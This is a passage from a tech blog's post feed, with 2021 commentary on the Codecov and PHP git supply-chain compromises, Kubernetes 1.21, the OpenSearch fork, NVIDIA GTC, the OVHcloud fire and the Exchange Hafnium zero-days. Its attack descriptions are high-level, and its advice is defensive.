But it creates a verifiable audit trail and decouples your CI security from the security posture of every third-party tool vendor in your pipeline.\nHardening Your CI/CD Pipeline # If this incident doesn\u0026rsquo;t prompt a review of your CI/CD security posture, I\u0026rsquo;m not sure what will. Here are the concrete steps every team should be taking:\nAudit your pipeline dependencies. List every external script, binary, or service that your CI pipeline downloads and executes. For each one, assess: what credentials does it have access to? What would happen if it were compromised?\nPin and verify external tools. Don\u0026rsquo;t download scripts from mutable URLs. Pin to specific versions, verify checksums, and ideally vendor the tools in your own repository. Yes, this means more maintenance. That\u0026rsquo;s the cost of security.\nMinimize CI environment variables. Only inject the credentials that a specific step actually needs. Most CI platforms support scoping secrets to specific jobs or steps. Use those features. If your coverage upload step doesn\u0026rsquo;t need your AWS credentials, don\u0026rsquo;t give it access to them.\nRotate credentials regularly. And if you used Codecov\u0026rsquo;s Bash Uploader between January 31 and April 1, 2021, rotate everything. Every credential, every token, every key that was present in those CI environments should be considered compromised.\nConsider credential helpers over environment variables. Some CI platforms support short-lived, scoped credentials that are fetched just-in-time rather than injected as environment variables. AWS OIDC federation with GitHub Actions, for instance, eliminates the need for static AWS keys entirely.\nMy Take # I\u0026rsquo;ve been setting up CI/CD pipelines for over fifteen years, and the dirty secret of the industry is that most pipelines are built for speed and convenience, not security. 
We treat our CI environments as trusted — running arbitrary downloaded scripts, injecting every credential we might need, and hoping that the third-party tools we depend on stay safe.\nCodecov is a reputable company. They didn\u0026rsquo;t do anything egregiously wrong in how they built their product. But the trust model was fragile by design: a single point of compromise in their build process cascaded into a potential breach of thousands of downstream organizations. That\u0026rsquo;s a systemic problem, not an individual failure.\nThe SolarWinds attack targeted the build pipeline. The PHP Git server compromise targeted the source code repository. Now Codecov shows that the CI/CD tools themselves are targets. The pattern is clear: attackers are moving up the supply chain, targeting the infrastructure that developers trust implicitly.\nWe need to stop treating our build pipelines as safe spaces. They\u0026rsquo;re attack surfaces, and they deserve the same security rigor we apply to production environments. Every external dependency in your CI pipeline is a trust relationship, and every trust relationship is a potential vulnerability.\n","date":"15 April 2021","externalUrl":null,"permalink":"/posts/210415-codecov-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Codecov’s compromised Bash Uploader script exposed CI/CD secrets for thousands of organizations, highlighting a systemic weakness in how we trust third-party tools in our build pipelines.","title":"The Codecov Breach — When Your CI Pipeline Becomes the Attack Vector","type":"posts"},{"content":"Kubernetes 1.21, codenamed \u0026ldquo;Power to the Community,\u0026rdquo; dropped today and it\u0026rsquo;s a release that tells an interesting story — not through flashy new features, but through the sheer number of items graduating to stable. Thirteen enhancements moved to GA in this release, the most in any single Kubernetes release so far. 
Following the foundation laid by Kubernetes 1.19, this release continues the platform\u0026rsquo;s maturation. The number of graduations is a strong signal that the project is shifting from \u0026ldquo;move fast and add features\u0026rdquo; to \u0026ldquo;stabilize what we have.\u0026rdquo;\nImmutable Secrets and ConfigMaps Hit GA # The headline feature for me is the graduation of immutable Secrets and ConfigMaps to stable. This has been in beta since 1.19, and its promotion to GA is well-deserved. The concept is simple: once you mark a Secret or ConfigMap as immutable, it cannot be updated. Any attempt to modify it will be rejected by the API server. This aligns with broader infrastructure security patterns that will continue through Kubernetes 1.22.\nWhy does this matter? First, performance. The kubelet watches for changes to Secrets and ConfigMaps that pods reference. When you have thousands of pods across hundreds of nodes, that\u0026rsquo;s an enormous amount of watch traffic hitting the API server. Immutable resources can be skipped by the watch mechanism entirely, reducing load on both the kubelet and the API server significantly. In clusters I\u0026rsquo;ve managed with several thousand pods, the API server load from Secret watches alone was non-trivial.\nSecond, safety. An immutable Secret can\u0026rsquo;t be accidentally (or maliciously) modified. In a world where a single misconfigured ConfigMap can cascade through an entire deployment, having an explicit \u0026ldquo;this is locked, don\u0026rsquo;t touch it\u0026rdquo; flag is a meaningful guard rail. 
You have to create a new Secret and update the pod spec to reference it — which means going through your normal deployment pipeline with all its reviews and approvals.\napiVersion: v1 kind: Secret metadata: name: database-credentials type: Opaque data: password: cGFzc3dvcmQxMjM= immutable: true It\u0026rsquo;s a small addition syntactically, but it changes the operational model in important ways.\nCronJobs Graduate to GA # CronJobs have been in beta since Kubernetes 1.8 — that\u0026rsquo;s over three years in beta. Their graduation to GA in 1.21 comes with a new controller implementation (CronJobControllerV2) that\u0026rsquo;s more reliable and performant than the old one.\nThe old CronJob controller had well-known issues with missed schedules, especially under API server load. If the controller couldn\u0026rsquo;t list jobs quickly enough, it might miss a scheduled run or, worse, create duplicate jobs. The new controller addresses these issues with a more robust scheduling algorithm and better handling of clock skew.\nFor those of us running batch workloads on Kubernetes — ETL jobs, report generation, cleanup tasks — this is a welcome stabilization. I\u0026rsquo;ve had to implement workarounds for CronJob reliability issues in production for years, including external cron schedulers that create Kubernetes Jobs directly. Being able to trust the built-in CronJob controller simplifies operations considerably.\nPodSecurityPolicy Deprecation # The flip side of all these graduations is the formal deprecation of PodSecurityPolicy (PSP). PSPs have been the primary mechanism for enforcing security constraints on pods — things like preventing privileged containers, restricting volume types, or enforcing read-only root filesystems.\nThe deprecation isn\u0026rsquo;t surprising. PSPs have been widely criticized for their confusing authorization model, difficult debugging experience, and inconsistent behavior. 
The Kubernetes team has been signaling this move for a while, and the replacement — a new Pod Security Admission controller — is in development.\nThe practical impact is that PSPs will continue to work until their planned removal in Kubernetes 1.25, giving teams roughly two years to migrate. But if you\u0026rsquo;re running PSPs in production, now is the time to start planning your migration strategy. The new admission controller will use a simplified model based on three predefined security profiles (Privileged, Baseline, and Restricted) rather than the current highly-configurable-but-confusing approach.\nGraceful Node Shutdown Goes Beta # Another notable feature is the graduation of graceful node shutdown to beta. When a node is shutting down (whether for maintenance, scaling down, or a cloud provider spot instance reclamation), Kubernetes can now detect the shutdown signal and gracefully terminate pods in priority order, respecting their terminationGracePeriodSeconds.\nThis is particularly relevant for cloud environments where spot/preemptible instances are common. Without graceful shutdown, pods on a terminating node get killed abruptly, potentially corrupting in-progress work or losing data. With this feature, the kubelet takes a systemd inhibitor lock to delay the shutdown and orchestrates a clean shutdown sequence.\nIn practice, this means your stateful workloads — databases, message queues, long-running batch jobs — have a much better chance of shutting down cleanly when the underlying node disappears. It\u0026rsquo;s the kind of feature that doesn\u0026rsquo;t make headlines but saves you from 3 AM incident calls.\nMy Take # Kubernetes 1.21 isn\u0026rsquo;t a release that will generate breathless blog posts about revolutionary new capabilities. And that\u0026rsquo;s exactly what the ecosystem needs right now. 
The platform has been growing features at a breakneck pace for years, and the operational reality has been that many of those features sat in alpha or beta for extended periods, leaving operators in a perpetual state of \u0026ldquo;can I actually rely on this?\u0026rdquo; The infrastructure ecosystem as a whole was demanding this stabilization after years of rapid innovation.\nHaving thirteen features graduate to stable in a single release is the Kubernetes project saying: \u0026ldquo;We\u0026rsquo;re finishing what we started.\u0026rdquo; That\u0026rsquo;s maturity. I\u0026rsquo;ve been running Kubernetes in production since the 1.6 days, and the difference in stability and operational confidence between then and now is night and day.\nThe PSP deprecation is the right call, even though it creates migration work. Sometimes you have to admit that an approach didn\u0026rsquo;t work and start fresh with the lessons learned. The new admission controller design looks much more pragmatic — three profiles instead of an infinitely configurable policy space means less room for misconfiguration.\nIf you\u0026rsquo;re running 1.20 in production, plan your upgrade path. The immutable Secrets feature alone is worth the effort for large clusters. 
And if you\u0026rsquo;re still relying on PSPs, start reading up on the replacement now — two years sounds like a lot of time until you\u0026rsquo;re six months out and haven\u0026rsquo;t started.\n","date":"8 April 2021","externalUrl":null,"permalink":"/posts/210408-kubernetes-1-21-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.21 lands with immutable Secrets and ConfigMaps going stable, CronJobs promoted to GA, and signals that the platform is maturing past its explosive growth phase.","title":"Kubernetes 1.21 — Immutable Secrets and the March Toward Maturity","type":"posts"},{"content":"Last weekend, the PHP project disclosed that attackers had compromised its official Git server at git.php.net, pushing two malicious commits to the php-src repository under the names of Rasmus Lerdorf and Nikita Popov. The commits were disguised as typo fixes but contained a backdoor that would allow remote code execution on any server running the tainted builds. The PHP team caught it quickly, but the implications ripple far beyond one project.\nWhat Actually Happened # On March 28th, two commits appeared in the php-src repository that looked innocuous at first glance — they were titled as minor typographical corrections. But buried in the code was a line that checked for a specific string in the HTTP User-Agent header and, if matched, executed arbitrary PHP code. It was a textbook webshell hidden in plain sight.\nThe PHP maintainers reverted the commits within hours and began investigating. The working theory is that the git.php.net server itself was compromised, rather than individual developer accounts. This is a critical distinction: it means the attacker bypassed the authentication layer at the infrastructure level.\nAs a result, the PHP project has made the decision to move its canonical repository to GitHub. The self-hosted git.php.net server, which has served the project for years, is being retired. 
It\u0026rsquo;s a pragmatic choice, but also a symbolic one — the era of major open-source projects self-hosting their critical infrastructure is fading.\nThe Supply Chain Trust Problem # This incident crystallizes a problem that\u0026rsquo;s been growing for years: the software supply chain is only as strong as its weakest link. PHP powers roughly 79% of websites with a known server-side language, according to W3Techs. If those malicious commits had made it into a release — even a minor one — the blast radius would have been staggering.\nWe\u0026rsquo;ve seen variations of this before. The event-stream incident in the Node.js ecosystem in 2018 showed how a single compromised package could affect thousands of downstream projects. The SolarWinds breach demonstrated nation-state-level supply chain attacks. But there\u0026rsquo;s something particularly unsettling about an attacker gaining commit access to a language\u0026rsquo;s source code itself.\nThe trust model in open-source has traditionally been built on reputation and review. Maintainers know each other, they review each other\u0026rsquo;s code, and the commit history is public. But when the server hosting that commit history is compromised, all of those safeguards evaporate. You can\u0026rsquo;t trust a code review process if the attacker can modify the code after review.\nSelf-Hosting vs. Platform Dependency # The PHP team\u0026rsquo;s move to GitHub is practical — GitHub has dedicated security teams, hardware security modules for signing, and infrastructure that most open-source projects can\u0026rsquo;t match. But it does raise questions about centralization. We\u0026rsquo;re putting an enormous amount of trust in a single platform (owned by Microsoft) to host the source code for the majority of the open-source ecosystem.\nI\u0026rsquo;ve run self-hosted Git servers for client projects over the years, and the maintenance burden is real. 
Keeping the server patched, managing SSH keys, monitoring for intrusions — it\u0026rsquo;s a full-time job that most open-source projects don\u0026rsquo;t have the resources for. The PHP project maintained git.php.net with a small team of volunteers, and that was apparently enough for attackers to find a way in.\nThe trade-off is clear: self-hosting gives you control but demands constant vigilance. Platform hosting gives you security infrastructure but creates a dependency. For most projects, the answer is increasingly obvious — let the platform handle infrastructure security while you focus on code quality.\nCommit Signing Matters More Than Ever # One of the key takeaways here is the importance of cryptographic commit signing. If the PHP project had enforced GPG-signed commits, the malicious pushes would have been immediately flagged — the attacker would have needed not just server access but also the private keys of the developers they were impersonating.\nGit supports commit signing natively, and GitHub can verify signatures and display a \u0026ldquo;Verified\u0026rdquo; badge. Yet adoption remains surprisingly low, even among major projects. It\u0026rsquo;s one of those security practices that everyone agrees is important but few actually implement consistently.\nIf you maintain an open-source project — or even a private one — now is the time to enforce signed commits. The tooling has gotten significantly better, and the cost of not doing it was just demonstrated in vivid detail.\nMy Take # I\u0026rsquo;ve been working with PHP since the PHP 3 days, and while I\u0026rsquo;ve moved on to other languages for most of my work, I still have a deep respect for the ecosystem. The speed of the response here was impressive — the maintainers caught the malicious commits within hours, not days or weeks. 
That\u0026rsquo;s the open-source model working as intended.\nBut this incident should be a wake-up call for every open-source project that self-hosts critical infrastructure. The attack surface is expanding, and volunteer maintainers are increasingly outmatched by well-resourced adversaries. Moving to platforms with professional security teams isn\u0026rsquo;t a sign of weakness — it\u0026rsquo;s an acknowledgment of reality.\nThe broader question of software supply chain security isn\u0026rsquo;t going away. If anything, attacks like this one, combined with SolarWinds and the growing catalog of compromised packages, suggest we need fundamental changes in how we verify and distribute software. Signed commits, reproducible builds, and transparent build pipelines aren\u0026rsquo;t optional anymore. They\u0026rsquo;re the minimum bar for a trustworthy software ecosystem.\n","date":"1 April 2021","externalUrl":null,"permalink":"/posts/210401-php-git-server-compromise/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Attackers pushed malicious commits to PHP’s official Git repository, exposing the fragile trust model behind open-source supply chains.","title":"PHP's Git Server Breach — A Supply Chain Wake-Up Call for Open Source","type":"posts"},{"content":"The other shoe has dropped. Yesterday, AWS announced OpenSearch, a community-driven fork of Elasticsearch and Kibana under the Apache 2.0 license. This was the widely expected response to Elastic\u0026rsquo;s January decision to relicense Elasticsearch from Apache 2.0 to the Server Side Public License (SSPL) and the Elastic License. 
And with it, we\u0026rsquo;ve entered a new chapter in the most significant open source licensing dispute since Redis and MongoDB went through similar transitions.\nLet me be upfront: I have mixed feelings about this, and I think anyone who doesn\u0026rsquo;t is either not paying attention or has picked a side for tribal reasons rather than technical ones.\nThe Background # In January, Elastic announced that Elasticsearch and Kibana would move from the Apache 2.0 license to a dual license under SSPL and the Elastic License. The stated reason: AWS was offering Elasticsearch as a managed service, contributing minimally back to the project, and using the Elastic trademark in ways that confused customers.\nElastic\u0026rsquo;s argument has merit. They built the product, they employ most of the contributors, and they watched a company with functionally unlimited resources offer their software as a competing managed service. The financial dynamics are real — Elastic\u0026rsquo;s business depends on selling managed Elasticsearch, and AWS\u0026rsquo;s offering directly undercuts that. This tension between open source sustainability and cloud provider capture is fundamental.\nAWS\u0026rsquo;s counterargument also has merit. Elasticsearch was Apache 2.0 licensed. That license explicitly permits this kind of use. Elastic benefited enormously from the open source ecosystem — community contributions, integrations, adoption — and changing the license after achieving dominance feels like pulling up the ladder behind you. The pattern repeats across multiple projects as commercial open source companies shift toward proprietary licensing.\nWhat OpenSearch Actually Is # OpenSearch will fork from Elasticsearch 7.10.2, the last Apache 2.0-licensed version. 
It will include the Open Distro for Elasticsearch features that AWS has been developing — security, alerting, SQL support, and performance tools — which were already Apache 2.0 licensed.\nThe project will live under its own governance (details still TBD), accept community contributions, and maintain compatibility with the Elasticsearch API. AWS has committed to ongoing development and is positioning this as a community project, not just an AWS product.\nFrom a technical perspective, the immediate impact is limited. Elasticsearch 7.10.2 is a solid, mature product. The codebase is well-understood, and the basic functionality isn\u0026rsquo;t going anywhere. The question is what happens over the next year or two as the Elastic-maintained Elasticsearch and the AWS-maintained OpenSearch diverge.\nThe Fork Dynamics # History tells us that forks can go several ways. Some become the dominant project (LibreOffice over OpenOffice, MariaDB gaining significant ground on MySQL). Others wither as the community consolidates around the original (the various Node.js fork attempts before the io.js merger). The outcome usually depends on where the contributors and the ecosystem go.\nAWS has resources that Elastic can\u0026rsquo;t match. They can throw engineers at OpenSearch, integrate it deeply into their cloud platform, and leverage their massive customer base. But Elastic has the brand, the existing contributor community, most of the institutional knowledge, and years of momentum.\nFor downstream users, the concern is API compatibility. If you\u0026rsquo;re building on the Elasticsearch REST API today, will your code work with both Elasticsearch and OpenSearch in two years? Probably, for the basics. But as features diverge, the compatibility surface will shrink. 
This is the MariaDB/MySQL story repeating itself — initially interchangeable, then increasingly not.\nThe Broader Open Source Question # This situation crystallizes a tension that\u0026rsquo;s been building in open source for years: how do you sustain open source projects when cloud providers can operationalize them at scale without proportional contribution?\nThe SSPL was MongoDB\u0026rsquo;s answer. The BSL (Business Source License) is MariaDB\u0026rsquo;s variant. Elastic\u0026rsquo;s dual license is another approach. Redis tried Commons Clause before switching to the Redis Source Available License. Each of these represents a company saying: \u0026ldquo;We can\u0026rsquo;t sustain this project if cloud providers capture most of the value.\u0026rdquo;\nAnd they\u0026rsquo;re not wrong. The economics are genuinely difficult. But the solutions all involve restricting freedoms that the community relied on, which erodes trust.\nAWS\u0026rsquo;s response — forking and maintaining an open source version — is technically within their rights and arguably good for open source purity. But it\u0026rsquo;s also an exercise of massive corporate power. A startup can\u0026rsquo;t sustain a fork of Elasticsearch. AWS can. That asymmetry matters.\nI don\u0026rsquo;t think there\u0026rsquo;s a clean \u0026ldquo;good guy / bad guy\u0026rdquo; narrative here. Elastic changed the rules after benefiting from open source adoption. AWS is using its overwhelming resources to maintain a fork that serves its business interests. Both are acting rationally within their constraints. Both are also, in different ways, making the open source ecosystem a more complicated place.\nPractical Implications # If you\u0026rsquo;re running Elasticsearch today, here\u0026rsquo;s what I\u0026rsquo;d suggest:\nDon\u0026rsquo;t panic. Nothing changes immediately. Your current Elasticsearch deployment continues to work. Evaluate your license exposure. 
If you\u0026rsquo;re using Elasticsearch 7.11+, you\u0026rsquo;re on the new license. Understand what that means for your use case. Watch the ecosystem. Log management tools, APM solutions, and other integrations will need to decide which project to support. Those decisions will shape the practical viability of each fork. Abstract your search layer. If you haven\u0026rsquo;t already, use an abstraction layer between your application and Elasticsearch. This gives you flexibility to switch between Elasticsearch and OpenSearch (or something else entirely) as the situation evolves. Keep an eye on OpenSearch governance. The difference between a genuine community project and an AWS-controlled project with community window dressing will become apparent in the governance model. My Take # I\u0026rsquo;ve used Elasticsearch since version 0.90. It\u0026rsquo;s been a transformative technology — making full-text search accessible to small teams was genuinely revolutionary. Watching this licensing drama play out is dispiriting, but it was probably inevitable.\nMy honest assessment: in two years, we\u0026rsquo;ll likely have two viable projects serving somewhat different audiences. Elasticsearch will cater to organizations that want the integrated Elastic Stack experience (ELK/Elastic Security/Elastic Observability). OpenSearch will serve organizations that want a managed search and analytics engine, primarily on AWS but potentially elsewhere.\nFor the open source community, the lesson is uncomfortable: build something successful enough, and the license you chose becomes your vulnerability. Whether the answer is better licenses, better business models, or better norms around cloud provider contributions, the current equilibrium clearly isn\u0026rsquo;t sustainable. 
Something has to give.\n","date":"25 March 2021","externalUrl":null,"permalink":"/posts/210325-aws-opensearch-elasticsearch-fork/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Amazon announces OpenSearch, a fork of Elasticsearch, escalating the most consequential open source licensing battle in years.","title":"AWS Forks Elasticsearch — The OpenSearch Announcement and What It Means for Open Source","type":"posts"},{"content":"NVIDIA\u0026rsquo;s GPU Technology Conference kicked off this week, and Jensen Huang delivered his keynote from what I can only assume is the most expensive kitchen in Silicon Valley. The leather jacket is back, the ambition is cranked to eleven, and the announcements paint a clear picture of where NVIDIA thinks computing is heading.\nThe headline grabber is Grace, NVIDIA\u0026rsquo;s first datacenter CPU — an ARM-based processor designed specifically for AI workloads. But there\u0026rsquo;s a lot more under the surface: the A30 and A10 GPUs for mainstream inference, NVIDIA Base Command and Fleet Command for managing AI infrastructure, and a raft of software platform updates. Let\u0026rsquo;s unpack what actually matters for developers and infrastructure teams.\nGrace: NVIDIA\u0026rsquo;s ARM Bet # The Grace CPU is named after Grace Hopper (a choice I fully endorse), and it represents NVIDIA\u0026rsquo;s first serious foray into designing datacenter CPUs. It\u0026rsquo;s ARM-based, built on ARMv9, and optimized specifically for large-scale AI training workloads where the bottleneck is moving data between CPU and GPU memory.\nThe key technical claim: Grace will use LPDDR5x memory with a unified memory architecture that provides 10x the bandwidth of today\u0026rsquo;s NVIDIA DGX systems for CPU-GPU data transfer. 
For training massive models — the kind of thing that\u0026rsquo;s becoming standard in NLP — the CPU-to-GPU memory pipeline is increasingly the constraint, not raw GPU compute.\nThis is a strategic move on multiple levels. First, it reduces NVIDIA\u0026rsquo;s dependency on Intel and AMD for the CPU side of their AI platforms. Second, it positions NVIDIA in the ARM server ecosystem alongside Ampere Computing, AWS Graviton, and Fujitsu\u0026rsquo;s A64FX. Third, it lets NVIDIA optimize the entire system — CPU, GPU, memory, interconnect — as a single design, much like Apple\u0026rsquo;s M1 approach but for datacenter AI.\nGrace won\u0026rsquo;t ship until 2023, so this is a long-term signal rather than something to plan infrastructure around today. But it tells you where NVIDIA sees the industry going: tightly integrated, heterogeneous compute platforms purpose-built for AI workloads.\nThe A30 and A10: AI For the Rest of Us # While Grace grabbed the headlines, the A30 and A10 GPUs are arguably more relevant for most organizations today. These are mainstream datacenter GPUs aimed at the inference market — the part of the AI pipeline that runs trained models in production.\nThe A30 offers 24GB of HBM2 memory with multi-instance GPU (MIG) support, letting you partition a single GPU into multiple isolated instances. For inference serving, this is significant: you can run multiple models or serve multiple tenants on a single GPU without interference.\nThe A10 targets both inference and graphics workloads, making it a versatile option for organizations that need both AI serving and virtual desktop infrastructure. At 24GB GDDR6, it\u0026rsquo;s positioned as a cost-effective step up from T4 cards.\nWhat I find interesting about these announcements is the clear message: NVIDIA is moving beyond selling GPUs to selling AI platforms. 
The hardware is increasingly just the foundation for a software ecosystem that includes CUDA, TensorRT, Triton Inference Server, and now the management tools (Base Command, Fleet Command) that enterprises need to operationalize AI.\nSoftware Platform: Triton and Beyond # Speaking of software, the Triton Inference Server updates deserve attention. Triton is NVIDIA\u0026rsquo;s open-source inference serving framework, and it\u0026rsquo;s becoming genuinely good. Version 2.8 adds support for running on CPUs (not just GPUs), model ensembles, and improved auto-scaling.\nFor teams that are deploying ML models in production, the inference serving layer is often the most painful part of the stack. You\u0026rsquo;ve got your beautifully trained model, and now you need to serve it with low latency, handle batching efficiently, manage model versions, and scale appropriately. Triton handles most of this, and the fact that it\u0026rsquo;s open-source makes it a viable option even if you\u0026rsquo;re not running NVIDIA hardware for everything.\nThe pattern I\u0026rsquo;m seeing across the industry — from NVIDIA\u0026rsquo;s Triton to TensorFlow Serving to Seldon Core — is that ML inference serving is maturing into a proper infrastructure category. Two years ago, most teams were hand-rolling Flask APIs around their models. The tooling has gotten dramatically better.\nWhat This Means for Developers # If you\u0026rsquo;re a developer who doesn\u0026rsquo;t work directly with AI infrastructure, you might be wondering why you should care about GPU announcements. Here\u0026rsquo;s why: the infrastructure that NVIDIA is building isn\u0026rsquo;t just for training GPT-3 clones. 
It\u0026rsquo;s increasingly relevant for any application that benefits from AI-powered features.\nReal-time recommendation engines, natural language processing, computer vision, anomaly detection — these capabilities are moving from \u0026ldquo;specialized AI team\u0026rdquo; territory into mainstream application development. The hardware and software platforms being announced at GTC are what make that transition possible at reasonable cost.\nThe move toward purpose-built AI infrastructure also has implications for cloud costs. Today, renting GPU instances on AWS, Azure, or GCP is expensive. As dedicated inference hardware like the A30 and A10 becomes widely available, and as software like Triton makes it easier to share GPUs across workloads, the cost per inference will continue to drop.\nMy Take # NVIDIA\u0026rsquo;s GTC keynote was impressive but also a bit overwhelming — Jensen announced enough products and platforms to fill a week of presentations, compressed into a two-hour kitchen tour. The company\u0026rsquo;s ambition is clear: they want to own the entire AI computing stack, from silicon to software platform.\nWhether that\u0026rsquo;s good for the industry depends on your perspective. NVIDIA\u0026rsquo;s CUDA ecosystem has been incredibly enabling, but it\u0026rsquo;s also created significant vendor lock-in. The Grace CPU move extends that potential lock-in from GPUs to the entire server platform.\nFor now, though, the practical takeaway is this: if you\u0026rsquo;re running AI inference workloads, the tooling and hardware options are better and cheaper than they were a year ago, and that trend is accelerating. If you\u0026rsquo;re not running AI workloads yet but you\u0026rsquo;re building applications that could benefit from them, the barrier to entry is dropping fast. 
That\u0026rsquo;s worth paying attention to, regardless of how you feel about leather jackets and kitchen keynotes.\n","date":"18 March 2021","externalUrl":null,"permalink":"/posts/210318-nvidia-gtc-2021-grace-cpu/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s GTC keynote reveals new hardware and software ambitions that signal where AI infrastructure is heading — and what developers should pay attention to.","title":"NVIDIA GTC 2021 — GPUs, Grace, and the AI Infrastructure Arms Race","type":"posts"},{"content":"Yesterday morning, a fire broke out at OVHcloud\u0026rsquo;s SBG2 datacenter in Strasbourg, France. It didn\u0026rsquo;t just damage the facility — it destroyed it entirely, along with a significant portion of the adjacent SBG1 building. SBG3 and SBG4 were taken offline as a precaution. In one night, a substantial chunk of Europe\u0026rsquo;s largest cloud provider went up in smoke. Literally.\nThe images circulating on social media are remarkable. The entire five-story SBG2 building engulfed in flames, the metal structure glowing orange against the night sky. No injuries reported, thankfully, but the data losses are already proving catastrophic for many customers.\nOVHcloud founder Octave Klaba has been posting updates on Twitter with admirable transparency, but the reality is grim: SBG2 is a total loss. For customers whose data lived exclusively in that facility, with no off-site backups, it\u0026rsquo;s gone. Permanently.\nThe Blast Radius # OVHcloud hosts approximately 1.5 million websites across its infrastructure. The Strasbourg campus was one of their major European hubs. 
In the hours since the fire, we\u0026rsquo;ve seen:\nGovernment agencies in France with services offline The Centre Pompidou\u0026rsquo;s website down Multiple game servers (Rust players are particularly vocal) wiped entirely Cryptocurrency platforms, e-commerce sites, and SaaS applications offline data.gouv.fr, the French government\u0026rsquo;s open data platform, inaccessible Octave Klaba has stated that SBG1 and SBG4 should be partially restored within one to two weeks, and SBG3 within two weeks. SBG2 will not be restored — it no longer exists. For customers with data replicated across availability zones, recovery is possible. For those without\u0026hellip; the conversations happening right now must be brutal.\nThe Shared Responsibility Misunderstanding # This event exposes what I consider the cloud industry\u0026rsquo;s original sin: the persistent, widespread misunderstanding of the shared responsibility model.\nWhen you buy a bare metal server or a VPS from OVHcloud (or any provider), you\u0026rsquo;re buying compute and network. You are not buying disaster recovery. You are not buying backups. You are not buying geographic redundancy. These are available as additional services, and OVHcloud offers them, but they\u0026rsquo;re not default.\nThe problem is that \u0026ldquo;cloud\u0026rdquo; has become synonymous with \u0026ldquo;resilient\u0026rdquo; in many people\u0026rsquo;s minds. Marketing language about \u0026ldquo;enterprise-grade infrastructure\u0026rdquo; and \u0026ldquo;99.99% uptime SLAs\u0026rdquo; creates an expectation that the provider handles everything. But an SLA is a financial agreement about service credits — it\u0026rsquo;s not a guarantee that your data survives a building fire.\nI\u0026rsquo;ve had this conversation with clients more times than I can count. \u0026ldquo;But it\u0026rsquo;s in the cloud!\u0026rdquo; Yes, and \u0026ldquo;the cloud\u0026rdquo; is a computer in someone else\u0026rsquo;s building. 
Buildings can flood, lose power, or — as we\u0026rsquo;ve just been reminded — catch fire.\nBackup Lessons (Again) # The 3-2-1 backup rule has been around for decades, and it exists precisely for moments like this:\n3 copies of your data 2 different storage media 1 off-site copy If your production database lives on an OVHcloud VPS in Strasbourg, and your only backup is a snapshot stored\u0026hellip; on OVHcloud\u0026rsquo;s infrastructure in Strasbourg, you don\u0026rsquo;t have a backup. You have two copies in the same blast radius.\nFor anyone reassessing their backup strategy after this wake-up call:\nAutomate off-site backups. Use restic, borgbackup, or similar tools to push encrypted backups to a geographically separate location. S3-compatible storage in a different region is cheap and effective. Test your restores. A backup you\u0026rsquo;ve never restored is Schrödinger\u0026rsquo;s backup — it both works and doesn\u0026rsquo;t work until you try. Schedule monthly restore tests. Document your recovery procedure. When everything is on fire (perhaps literally), you don\u0026rsquo;t want to be figuring out the restore process from scratch. Consider your RPO and RTO. Recovery Point Objective (how much data can you afford to lose) and Recovery Time Objective (how long can you be down) should drive your backup frequency and infrastructure choices. Multi-Region Is Not Optional # For production workloads that matter, single-datacenter deployment is a calculated risk. Sometimes that calculation makes sense — not every application justifies the complexity and cost of multi-region architecture. A personal blog, a staging environment, an internal tool used by five people — fine, single region.\nBut if your business depends on it, you need geographic redundancy. And not \u0026ldquo;two availability zones in the same campus\u0026rdquo; redundancy — actual geographic separation. OVHcloud\u0026rsquo;s SBG1 through SBG4 are all on the same campus in Strasbourg. 
Adjacent buildings. When one caught fire, they all went down.\nThis is where the major hyperscalers (AWS, Azure, GCP) have a structural advantage. Their region model, with availability zones that are physically separate facilities with independent power and cooling, provides genuine isolation. OVHcloud and other European providers have been building out similar capabilities, but the Strasbourg campus design clearly didn\u0026rsquo;t provide the isolation customers assumed.\nMy Take # I feel for the OVHcloud team and their customers. Octave Klaba\u0026rsquo;s transparency has been exemplary — real-time updates, honest assessments, no corporate spin. That\u0026rsquo;s how you handle a crisis.\nBut I also feel frustrated, because this conversation happens after every major outage. We collectively express shock, write blog posts about backup strategies, and then slowly drift back to complacency until the next incident. I watched the same cycle after the 2017 OVH Strasbourg power outage, after S3\u0026rsquo;s 2017 outage, after every significant infrastructure failure.\nThe lesson isn\u0026rsquo;t complicated: your data is your responsibility. Cloud providers sell infrastructure, not peace of mind. If you\u0026rsquo;re reading this and you\u0026rsquo;re not sure whether your backups would survive your primary datacenter being physically destroyed, that\u0026rsquo;s your action item for today. Not tomorrow. Today.\n","date":"11 March 2021","externalUrl":null,"permalink":"/posts/210311-ovhcloud-datacenter-fire/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A catastrophic fire at OVHcloud’s Strasbourg datacenter destroys thousands of servers and raises hard questions about cloud resilience and backup strategies.","title":"OVHcloud Strasbourg Fire — When 'The Cloud' Literally Burns Down","type":"posts"},{"content":"If you run on-premises Microsoft Exchange servers — or more critically, if your clients do — stop reading this and go patch. 
Seriously. Then come back.\nOn Tuesday, Microsoft released emergency out-of-band security updates for four zero-day vulnerabilities in Exchange Server 2013, 2016, and 2019. These aren\u0026rsquo;t theoretical. They\u0026rsquo;re being actively exploited in the wild by a state-sponsored group Microsoft has dubbed \u0026ldquo;Hafnium,\u0026rdquo; believed to be operating out of China. And the scale of this thing is staggering. This follows the pattern of large-scale supply chain compromise that the industry is still reeling from.\nThe vulnerabilities — CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 — can be chained together to achieve unauthenticated remote code execution on any internet-facing Exchange server. An attacker can read emails, plant web shells for persistent access, and move laterally through your network. All without credentials.\nHow the Attack Chain Works # The chain starts with CVE-2021-26855, a server-side request forgery (SSRF) vulnerability that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server itself. This is the initial foothold — no authentication required, just an HTTPS connection to port 443.\nFrom there, CVE-2021-26857 exploits an insecure deserialization vulnerability in the Unified Messaging service. If that service is enabled (it often is), the attacker gains SYSTEM-level code execution. The remaining two CVEs provide post-authentication arbitrary file write capabilities, which are being used to drop web shells — typically in accessible directories like C:\\inetpub\\wwwroot\\aspnet_client\\.\nWhat makes this particularly nasty is the simplicity. The SSRF vulnerability means any Exchange server with Outlook Web Access (OWA) exposed to the internet is a target. And there are hundreds of thousands of these servers. Volexity, who discovered the initial exploitation, reports seeing activity going back to at least January 6, 2021. 
